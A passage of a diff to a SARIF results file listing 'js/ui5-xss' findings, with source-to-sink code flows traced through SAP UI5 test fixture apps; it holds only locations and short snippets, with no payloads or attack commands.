+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + 
"message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5d5122f6c75b5d01:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "/input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + }, + "message" : { + "text" : "/input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c18df3aa119b40dc:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "\"value\": \"{/input}\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + }, + "region" : { + 
"startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + }, + "message" : { + "text" : "\"content\": \"{/input}\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "74b35e217af6aa05:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" 
: 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9caa0f252fbe2993:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 31, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 10, + "startColumn" : 44, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 32, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output1: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output1}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + 
"toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "2963bbd458e69924:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "oEvent. ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 60 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 19, + "startColumn" : 44, + "endColumn" : 55 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + 
"region" : { + "startLine" : 34, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output3: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output3}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : 
"user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1406455ac263a2d9:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 12, + "startColumn" : 26, + "endColumn" : 46 + } + }, + "message" : { + "text" : "new JSONModel(oData)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" 
: { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 48 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 29 + } + }, + "message" : { + "text" : "output: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + 
"toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + }, + "region" : { + "startLine" : 8, + "startColumn" : 40, + "endColumn" : 63 + } + }, + "message" : { + "text" : "\"contro ... 
l.json\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5edd24be658b61a4:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "data-value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + }, + "message" : { + "text" : "data-content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + 
}, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6e0d8f690e30e24a:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : 
